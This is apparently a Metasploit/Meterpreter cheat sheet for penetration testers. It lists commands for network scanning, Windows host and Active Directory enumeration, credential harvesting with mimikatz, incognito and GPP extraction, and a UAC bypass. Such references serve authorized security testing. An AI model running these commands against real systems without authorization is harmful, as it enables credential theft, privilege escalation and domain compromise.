Metasploit

Meterpreter

Arp Scan

run arp_scanner -r <IP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito
list_tokens -u

Windows

# Collect a wide range of host information
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as another user
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection

AD

# ADSI enumeration (requires the extapi extension)
load extapi
help extapi

adsi_computer_enum domainname

# Group Policy Preferences (GPP) credentials
use post/windows/gather/credentials/gpp

Last updated 27 days ago